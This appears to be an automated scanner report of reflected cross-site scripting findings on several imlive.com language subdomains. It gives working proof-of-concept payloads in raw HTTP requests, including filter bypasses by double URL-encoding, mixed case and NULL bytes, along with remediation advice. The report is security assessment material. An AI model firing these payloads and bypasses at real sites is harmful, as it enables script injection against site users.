The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f was submitted in the gotopage parameter. This input was echoed as 244f6'><script>alert(1)</script>7358040fd9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f&waron=yes&promocode=YZSUSA5583 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
2.146. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://in.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76f4b'-alert(1)-'bf4b062c8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?76f4b'-alert(1)-'bf4b062c8a0=1 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=in.imlive.com&ul=/?76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&iy=dallas&id=44&iu=1&vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.147. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://in.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30418"><script>alert(1)</script>eb906244d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?30418"><script>alert(1)</script>eb906244d97=1 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload efac5'onerror%3d'alert(1)'f4ba4def511 was submitted in the gotopage parameter. This input was echoed as efac5'onerror='alert(1)'f4ba4def511 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=efac5'onerror%3d'alert(1)'f4ba4def511 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:50 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iin=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQSSTATD=NKPDBJMAFMLOCIAIEHIHPIKM; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:24:51 GMT Connection: close Content-Length: 8306 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.149. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://it.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1c9"><a>8cb16e9fe00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?9e1c9"><a>8cb16e9fe00=1 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||9e1c9"><a>8cb16e9fe00~1');return false;"> ...[SNIP]...
2.150. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46421'-alert(1)-'4594a948ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?46421'-alert(1)-'4594a948ef4=1 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a32d9'onerror%3d'alert(1)'7223884f696 was submitted in the gotopage parameter. This input was echoed as a32d9'onerror='alert(1)'7223884f696 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=a32d9'onerror%3d'alert(1)'7223884f696 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:04 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQSRBSD=HDONOIMAGIIFDHIHJOLHJHAN; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:04 GMT Connection: close Content-Length: 8305 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.152. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jp.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e62'-alert(1)-'e87ff225301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d2e62'-alert(1)-'e87ff225301=1 HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=jp.imlive.com&ul=/?d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&iy=dallas&id=44&iu=1&vd=7a755e33-be6e-4c0d-be05-9c18484cccd6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.153. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jp.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0=1 HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||bda08"><script>alert(1)</script>8bd9e847e0~1');return false;"> ...[SNIP]...
2.154. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mx.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'-alert(1)-'7c77be0c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9bb54'-alert(1)-'7c77be0c2b9=1 HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/?9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&iy=dallas&id=44&iu=1&vd=a7e3d806-3337-4a1b-9339-464061ff6408';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.155. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://mx.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d8"><a>9322a6cdc6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?601d8"><a>9322a6cdc6e=1 HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||601d8"><a>9322a6cdc6e~1');return false;"> ...[SNIP]...
2.156. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nl.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54070'-alert(1)-'486543e8cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?54070'-alert(1)-'486543e8cd0=1 HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/?54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&iy=dallas&id=44&iu=1&vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.157. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nl.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c=1 HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abf97'onerror%3d'alert(1)'3747a08c954 was submitted in the gotopage parameter. This input was echoed as abf97'onerror='alert(1)'3747a08c954 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/abf97'onerror%3d'alert(1)'3747a08c954 HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTQDQC=PKPLFJMAFPAENFFGPJDEIIPJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:25 GMT Connection: close Content-Length: 8315 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.159. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://no.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019f9e"><script>alert(1)</script>4ba4bc172bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19f9e"><script>alert(1)</script>4ba4bc172bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%0019f9e"><script>alert(1)</script>4ba4bc172bb=1 HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%0019f9e"><script>alert(1)</script>4ba4bc172bb~1');return false;"> ...[SNIP]...
2.160. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://no.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0a13'-alert(1)-'2db01fc98e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b0a13'-alert(1)-'2db01fc98e2=1 HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be3dc'onerror%3d'alert(1)'5045d73ef51 was submitted in the gotopage parameter. This input was echoed as be3dc'onerror='alert(1)'5045d73ef51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/be3dc'onerror%3d'alert(1)'5045d73ef51 HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ino=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQTQRCSD=FAOLDJMABFDNBFGJJENBGHOA; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:24 GMT Connection: close Content-Length: 8316 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.162. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pu.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46447"><script>alert(1)</script>ca3e148e25e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?46447"><script>alert(1)</script>ca3e148e25e=1 HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||46447"><script>alert(1)</script>ca3e148e25e~1');return false;"> ...[SNIP]...
2.163. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pu.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39ce'-alert(1)-'10f765ebe49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e39ce'-alert(1)-'10f765ebe49=1 HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/?e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&iy=dallas&id=44&iu=1&vd=918cb142-ac05-44ff-b781-bebd10f67a21';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.164. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ru.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9277'-alert(1)-'48bfaebef6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e9277'-alert(1)-'48bfaebef6a=1 HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/?e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&iy=dallas&id=44&iu=1&vd=591f9b95-a40e-412c-8b3f-904dd62e2a06';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.165. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ru.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ba898"><script>alert(1)</script>ea1f44e02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba898"><script>alert(1)</script>ea1f44e02c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%00ba898"><script>alert(1)</script>ea1f44e02c1=1 HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
